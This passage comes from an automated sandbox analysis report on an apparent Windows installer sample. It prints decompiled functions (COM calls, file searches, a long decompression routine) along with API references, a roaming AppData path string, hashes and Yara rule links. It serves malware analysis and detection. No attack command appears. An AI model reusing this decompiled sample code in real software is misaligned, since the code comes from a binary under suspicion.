							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402174
0x0040217e
0x00402188
0x00402195
0x004021a0
0x004021a3
0x004021bd
0x004021c3
0x004021c9
0x004021cc
0x004021d6
0x004021da
0x004021da
0x004021df
0x004021f0
0x004021f8
0x004022d4
0x004022d4
0x004022db
0x004021fe
0x004021fe
0x0040220d
0x00402211
0x00402214
0x0040221a
0x00402228
0x0040222b
0x0040222d
0x00402238
0x00402238
0x0040223d
0x0040223f
0x00402246
0x00402246
0x00402249
0x00402252
0x00402255
0x0040225a
0x0040225c
0x00402269
0x00402269
0x0040226c
0x00402278
0x0040227b
0x00402284
0x0040228a
0x00402291
0x004022aa
0x004022ac
0x004022ba
0x004022ba
0x004022aa
0x004022bd
0x004022c3
0x004022c3
0x004022c6
0x004022cc
0x004022d2
0x004022e7
0x00000000
0x00000000
0x00000000
0x004022d2
0x004022dd
0x00402a5d
0x00402a69

APIs

CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Roaming\RadioBOSSAssembly, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\RadioBOSSAssembly
API String ID: 123533781-3552626549
Opcode ID: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
Opcode Fuzzy Hash: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040646B, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040646B(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e0);
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e0;
			}

0x00406476
0x0040647f
0x00000000
0x0040648c
0x00406482
0x00000000

APIs

FindFirstFileA.KERNEL32(74B5FA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
FindClose.KERNEL32(00000000), ref: 00406482

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406055(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E004060F7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027b9
0x004027cd
0x004027d8
0x004027d9
0x00402918
0x004027bb
0x004027bb
0x004027bd
0x004027bf
0x004027bf
0x00402a5d
0x00402a69

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
Opcode Fuzzy Hash: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406945, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406945(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004070B4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3a8;
												if( *0x42e3a8 != 0) {
													L22:
													_t412 =  *0x40a42c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d224; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d220; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d228;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6a8;
													if(_t416 < 0x42d6a8) {
														L15:
														__eflags = _t416 - 0x42d464;
														_t438 = 8;
														if(_t416 > 0x42d464) {
															__eflags = _t416 - 0x42d628;
															if(_t416 >= 0x42d628) {
																__eflags = _t416 - 0x42d688;
																if(_t416 < 0x42d688) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d228, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d228 + _t440;
														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
														 *0x42e3a8 =  *0x42e3a8 + 1;
														__eflags =  *0x42e3a8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
